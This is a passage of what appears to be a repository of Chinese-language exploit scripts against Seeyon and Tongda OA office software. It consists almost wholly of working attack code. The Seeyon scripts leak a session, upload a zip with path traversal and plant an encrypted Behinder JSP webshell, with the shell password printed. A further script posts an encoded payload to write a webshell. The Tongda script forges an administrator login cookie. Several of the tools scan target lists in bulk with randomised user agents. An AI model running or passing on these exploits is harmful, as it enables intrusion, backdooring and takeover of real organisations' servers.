| ran_str = ''.join(random.sample(string.ascii_letters + string.digits, num)) 56 | return ran_str 57 | 58 | def get_cookie(targeturl): 59 | headers = {'User-Agent': get_ua(),'Content-Type': 'application/x-www-form-urlencoded'} 60 | url = '{targeturl}/seeyon/thirdpartyController.do'.format(targeturl=targeturl) 61 | post="method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1".encode("utf-8") 62 | try: 63 | response = requests.post(url=url,data=post,headers=headers, timeout=60,verify=False) 64 | if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower(): 65 | cookies = response.cookies 66 | cookies = requests.utils.dict_from_cookiejar(cookies) 67 | jsessionid = cookies['JSESSIONID'] 68 | return jsessionid 69 | else: 70 | exit() 71 | except: 72 | pass 73 | 74 | 75 | def upload_zip(targeturl,cookie): 76 | url = '{targeturl}/seeyon/fileUpload.do?method=processUpload'.format(targeturl=targeturl) 77 | files = [('file1', ('11.png', open('payload.zip', 'rb'), 'application/octet-stream'))] 78 | headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': get_ua()} 79 | post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0', 80 | 'isEncrypt': "0"} 81 | try: 82 | response = requests.post(url=url,files=files,data=post, headers=headers,timeout=60,verify=False) 83 | if response and response.status_code == 200 and 'fileurls=' in response.text: 84 | fileid = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I) 85 | if len(fileid) > 0: 86 | return fileid[0] 87 | print("\033[32m[+]目标 {} 正在上传压缩包文件.... \n[+] Cookie: {} \033[0m".format(targeturl,cookie)) 88 | else: 89 | exit() 90 | except: 91 | pass 92 | 93 | def extract_file(targeturl,cookie,fileid): 94 | url = '{targeturl}/seeyon/ajax.do'.format(targeturl=targeturl) 95 | headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': get_ua(), 'Content-Type':'application/x-www-form-urlencoded'} 96 | datestr = time.strftime('%Y-%m-%d') 97 | post = f'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22{datestr}%22%2C%22{fileid}%22%5D' 98 | try: 99 | response = requests.post(url, data=post,headers=headers,timeout=60,verify=False) 100 | if response.status_code == 500 and "Error" in response.text: 101 | print("\033[32m[+]目标 {} 解压文件成功.... \033[0m".format(targeturl)) 102 | return True 103 | else: 104 | print("\033[31m[x]目标 {} 解压文件失败.... \033[0m".format(targeturl)) 105 | exit() 106 | except Exception as e: 107 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url),e) 108 | 109 | def main(targeturl): 110 | fname = f'../{rand_str(8)}.jsp' 111 | shell = r'<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="5823cd3093f16f3b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 112 | check_file() 113 | write_zipfile(fname,shell) 114 | cookie = get_cookie(targeturl) 115 | fileid = upload_zip(targeturl, cookie) 116 | if extract_file(targeturl, cookie, fileid): 117 | url = targeturl + '/seeyon/common/designer/pageLayout/{fname}'.format(fname=fname.split('/')[1]) 118 | print("\033[32m[+]目标 {} 被上传冰蝎木马: {}\033[0m".format(targeturl, url)) 119 | print("\033[32m[+]冰蝎密码: bxmm \033[0m".format(targeturl)) 120 | else: 121 | print("\033[31m[x]目标 {} 不存在漏洞 \033[0m".format(targeturl)) 122 | 123 | if __name__ == '__main__': 124 | title() 125 | targeturl = str(input("\033[35m请输入需要检测的url:\033[0m")) 126 | main(targeturl) 127 | 128 | -------------------------------------------------------------------------------- /seeyon/致远OA_Session泄露_任意文件上传漏洞/poc.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import time 3 | import datetime 4 | import zipfile 5 | import random 6 | import string 7 | import requests 8 | import re 9 | import os 10 | 11 | requests.packages.urllib3.disable_warnings() 12 | 13 | def title(): 14 | print('+---------------------------------------------------') 15 | print('+ \033[34mVersion: 致远OA Session泄露 任意文件上传漏洞 \033[0m') 16 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 17 | print('+ \033[36m文件名: url.txt \033[0m') 18 | print('+---------------------------------------------------') 19 | 20 | #随机ua 21 | def get_ua(): 22 | first_num = random.randint(55, 62) 23 | third_num = random.randint(0, 3200) 24 | fourth_num = random.randint(0, 140) 25 | os_type = [ 26 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 27 | '(Macintosh; Intel Mac OS X 10_12_6)' 28 | ] 29 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 30 | 31 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 32 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 33 | ) 34 | return ua 35 | 36 | def check_file(): 37 | path = os.getcwd() 38 | file_path = os.path.join(path,"payload.zip") 39 | if os.path.exists(file_path): 40 | os.remove(file_path) 41 | 42 | 43 | def write_zipfile(fname, content): 44 | with zipfile.ZipFile( 45 | 'payload.zip', 46 | mode='a', 47 | compression=zipfile.ZIP_DEFLATED, 48 | ) as zf: 49 | zf.writestr('layout.xml', "") 50 | zf.writestr(fname, content) 51 | 52 | 53 | 54 | def rand_str(num): 55 | ran_str = ''.join(random.sample(string.ascii_letters + string.digits, num)) 56 | return ran_str 57 | 58 | def get_cookie(targeturl): 59 | headers = {'User-Agent': get_ua(),'Content-Type': 'application/x-www-form-urlencoded'} 60 | url = '{targeturl}/seeyon/thirdpartyController.do'.format(targeturl=targeturl) 61 | post="method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1".encode("utf-8") 62 | try: 63 | response = requests.post(url=url,data=post,headers=headers, timeout=60,verify=False) 64 | if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower(): 65 | cookies = response.cookies 66 | cookies = requests.utils.dict_from_cookiejar(cookies) 67 | jsessionid = cookies['JSESSIONID'] 68 | return jsessionid 69 | else: 70 | exit() 71 | except: 72 | pass 73 | 74 | 75 | def upload_zip(targeturl,cookie): 76 | url = '{targeturl}/seeyon/fileUpload.do?method=processUpload'.format(targeturl=targeturl) 77 | files = [('file1', ('11.png', open('payload.zip', 'rb'), 'application/octet-stream'))] 78 | headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': get_ua()} 79 | post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0', 80 | 'isEncrypt': "0"} 81 | try: 82 | response = requests.post(url=url,files=files,data=post, headers=headers,timeout=60,verify=False) 83 | if response and response.status_code == 200 and 'fileurls=' in response.text: 84 | fileid = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I) 85 | if len(fileid) > 0: 86 | return fileid[0] 87 | else: 88 | exit() 89 | except: 90 | pass 91 | 92 | def extract_file(targeturl,cookie,fileid): 93 | url = '{targeturl}/seeyon/ajax.do'.format(targeturl=targeturl) 94 | headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': get_ua(), 'Content-Type':'application/x-www-form-urlencoded'} 95 | datestr = time.strftime('%Y-%m-%d') 96 | post = f'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22{datestr}%22%2C%22{fileid}%22%5D' 97 | try: 98 | response = requests.post(url, data=post,headers=headers,timeout=60,verify=False) 99 | if response.status_code == 500 and "Error" in response.text: 100 | #print("[+] extract file is ok!") 101 | return True 102 | else: 103 | #print("[-] extract file error !") 104 | exit() 105 | except: 106 | pass 107 | 108 | 109 | 110 | 111 | 112 | def main(targeturl): 113 | fname = f'../{rand_str(8)}.jsp' 114 | shell = r'<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="5823cd3093f16f3b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 115 | check_file() 116 | write_zipfile(fname,shell) 117 | cookie = get_cookie(targeturl) 118 | fileid = upload_zip(targeturl, cookie) 119 | if extract_file(targeturl, cookie, fileid): 120 | url = targeturl + '/seeyon/common/designer/pageLayout/{fname}'.format(fname=fname.split('/')[1]) 121 | with open('webshell.txt', 'a', encoding='utf8') as web: 122 | web.write("webshell 地址: {url}\n".format(url=url)) 123 | print("\033[32m[+]目标 {} 被上传木马: {}\033[0m".format(targeturl, url)) 124 | 125 | # 获取每行url 126 | def get_urls_head(targeturl): 127 | line = 'http://'+targeturl 128 | lines ='https://'+targeturl 129 | try: 130 | response=requests.get(url=line,timeout=10,verify=False) 131 | if (response.status_code == 200): 132 | return line 133 | response = requests.get(url=lines, timeout=10, verify=False) 134 | if (response.status_code == 200): 135 | return lines 136 | except: 137 | pass 138 | 139 | if __name__ == '__main__': 140 | title() 141 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 142 | for line in open(file_name): 143 | line = line.strip('\n') 144 | targeturl = get_urls_head(line) 145 | if (targeturl != None): 146 | main(targeturl) 147 | 148 | -------------------------------------------------------------------------------- /seeyon/seeyon_ajax_exp/seeyon_upload_exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | from time import time 4 | import random 5 | import urllib3 6 | from urllib import parse 7 | from argparse import ArgumentParser 8 | import threadpool 9 | 10 | 11 | #python3 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | filename = sys.argv[1] 14 | url_list=[] 15 | 16 | 17 | #随机ua 18 | def get_ua(): 19 | first_num = random.randint(55, 62) 20 | third_num = random.randint(0, 3200) 21 | fourth_num = random.randint(0, 140) 22 | os_type = [ 23 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 24 | '(Macintosh; Intel Mac OS X 10_12_6)' 25 | ] 26 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 27 | 28 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 29 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 30 | ) 31 | return ua 32 | 33 | #poc扫描函数 减少误报 34 | def scan(url): 35 | url=parse.urlparse(url) 36 | url=url.scheme + '://' + url.netloc 37 | headers = {'User-Agent': get_ua()} 38 | rurl1 = str(url)+"/seeyon/autoinstall.do.css/..;/ajax.do" 39 | try: 40 | resp = requests.get(url = rurl1, headers = headers, verify = False, timeout=10) 41 | if "java.lang.NullPointerException:nul" in resp.text: 42 | print("[+]" + url + "存在文件上传漏洞!") 43 | post_shell(url) 44 | else: 45 | print("[-]" + url + "不存在文件上传漏洞。") 46 | except Exception as e: 47 | print("[!]很遗憾!目标不存在漏洞 {} \033[0m".format(e)) 48 | sys.exit(0) 49 | 50 | #getshell函数 51 | def post_shell(url): 52 | headers = {'User-Agent': get_ua()} 53 | rurl2 = str(url) + "/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip" 54 | data = "managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00" 55 | try: 56 | requests.post(url = rurl2, headers = headers, data = data, verify = False, timeout=5) 57 | get_shell(url) 58 | except: 59 | print("请求异常!已跳过。") 60 | 61 | #访问webshell成功并返回webshell地址 62 | def get_shell(url): 63 | headers = {'User-Agent': get_ua()} 64 | webshell = str(url)+ "/seeyon/SeeyonUpdate1.jspx" 65 | try: 66 | response = requests.get(url=webshell, timeout=10, verify=False, headers=headers) 67 | if response.status_code == 200: 68 | print("\033[32m[+] 目标 {} 成功上传 \033[0m".format(url)) 69 | print("\033[32m[+] webshell地址:{}/seeyon/SeeyonUpdate1.jspx \033[0m".format(url)) 70 | print("\033[32m[+] 冰蝎3默认马 pass :rebeyond \033[0m".format(url)) 71 | else: 72 | print("\033[31m[-] webshell写入失败 \033[0m") 73 | 74 | 75 | except Exception as e: 76 | print("\033[31m[-] 目标漏洞无法利用,写入失败 {} \033[0m".format(e)) 77 | sys.exit(0) 78 | 79 | 80 | #多线程 81 | def multithreading(url_list, pools=5): 82 | works = [] 83 | for i in url_list: 84 | works.append(i) 85 | pool = threadpool.ThreadPool(pools) 86 | reqs = threadpool.makeRequests(scan, works) 87 | [pool.putRequest(req) for req in reqs] 88 | pool.wait() 89 | 90 | 91 | if __name__ == "__main__": 92 | show = r''' 93 | 94 | _____ 95 | / ___| 96 | \ `--. ___ ___ _ _ ___ _ __ _____ ___ __ 97 | `--. \/ _ \/ _ \ | | |/ _ \| '_ \ / _ \ \/ / '_ \ 98 | /\__/ / __/ __/ |_| | (_) | | | | | __/> <| |_) | 99 | \____/ \___|\___|\__, |\___/|_| |_| \___/_/\_\ .__/ 100 | __/ | ______ | | 101 | |___/ |______| |_| 102 | 103 | fileupload_exp by m2 104 | ''' 105 | print(show + '\n') 106 | arg=ArgumentParser(description='seeyon_fileupload_exp By m2') 107 | arg.add_argument("-u", 108 | "--url", 109 | help="Target URL; Example:http://ip:port") 110 | arg.add_argument("-f", 111 | "--file", 112 | help="Target URL; Example:url.txt") 113 | args=arg.parse_args() 114 | url=args.url 115 | filename=args.file 116 | start=time() 117 | if url != None and filename == None: 118 | scan(url) 119 | elif url == None and filename != None: 120 | for i in open(filename): 121 | i=i.replace('\n','') 122 | url_list.append(i) 123 | multithreading(url_list,10) 124 | end=time() 125 | print('任务完成,用时%d' %(end-start)) 126 | -------------------------------------------------------------------------------- /tongdaOA/前台任意用户登录/通达OA前台任意用户登录漏洞.py: -------------------------------------------------------------------------------- 1 | ''' 2 | @Author : Sp4ce 3 | @Date : 2020-03-17 23:42:16 4 | LastEditors : Sp4ce 5 | LastEditTime : 2020-08-27 10:21:44 6 | @Description : Challenge Everything. 7 | ''' 8 | import requests 9 | from random import choice 10 | import argparse 11 | import json 12 | 13 | USER_AGENTS = [ 14 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 15 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", 16 | "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 17 | "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", 18 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)", 19 | "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)", 20 | "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)", 21 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)", 22 | "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6", 23 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1", 24 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0", 25 | "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5", 26 | "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6", 27 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", 28 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20", 29 | "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52", 30 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11", 31 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER", 32 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)", 33 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)", 34 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER", 35 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", 36 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)", 37 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)", 38 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)", 39 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)", 40 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", 41 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1", 42 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1", 43 | "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5", 44 | "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre", 45 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0", 46 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", 47 | "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10" 48 | ] 49 | 50 | headers={} 51 | 52 | def getV11Session(url): 53 | checkUrl = url+'/general/login_code.php' 54 | try: 55 | headers["User-Agent"] = choice(USER_AGENTS) 56 | res = requests.get(checkUrl,headers=headers) 57 | resText = str(res.text).split('{') 58 | codeUid = resText[-1].replace('}"}', '').replace('\r\n', '') 59 | getSessUrl = url+'/logincheck_code.php' 60 | res = requests.post( 61 | getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers) 62 | tmp_cookie = res.headers['Set-Cookie'] 63 | headers["User-Agent"] = choice(USER_AGENTS) 64 | headers["Cookie"] = tmp_cookie 65 | check_available = requests.get(url + '/general/index.php',headers=headers) 66 | if '用户未登录' not in check_available.text: 67 | if '重新登录' not in check_available.text: 68 | print('[+]Get Available COOKIE:' + tmp_cookie) 69 | else: 70 | print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.') 71 | except: 72 | print('[-]Something Wrong With '+url) 73 | 74 | 75 | 76 | def get2017Session(url): 77 | checkUrl = url+'/ispirit/login_code.php' 78 | try: 79 | headers["User-Agent"] = choice(USER_AGENTS) 80 | res = requests.get(checkUrl,headers=headers) 81 | resText = json.loads(res.text) 82 | codeUid = resText['codeuid'] 83 | codeScanUrl = url+'/general/login_code_scan.php' 84 | res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int( 85 | 1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers) 86 | resText = json.loads(res.text) 87 | status = resText['status'] 88 | if status == str(1): 89 | getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid 90 | res = requests.get(getCodeUidUrl) 91 | tmp_cookie = res.headers['Set-Cookie'] 92 | headers["User-Agent"] = choice(USER_AGENTS) 93 | headers["Cookie"] = tmp_cookie 94 | check_available = requests.get(url + '/general/index.php',headers=headers) 95 | if '用户未登录' not in check_available.text: 96 | if '重新登录' not in check_available.text: 97 | print('[+]Get Available COOKIE:' + tmp_cookie) 98 | else: 99 | print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.') 100 | else: 101 | print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable ?') 102 | except: 103 | print('[-]Something Wrong With '+url) 104 | 105 | 106 | if __name__ == "__main__": 107 | parser = argparse.ArgumentParser() 108 | parser.add_argument( 109 | "-v", 110 | "--tdoaversion", 111 | type=int, 112 | choices=[11, 2017], 113 | help="Target TongDa OA Version. e.g: -v 11、-v 2017") 114 | parser.add_argument( 115 | "-url", 116 | "--targeturl", 117 | type=str, 118 | help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1" 119 | ) 120 | args = parser.parse_args() 121 | url = args.targeturl 122 | if 'http://' not in url: 123 | url = 'http://' + url 124 | if args.tdoaversion == 11: 125 | 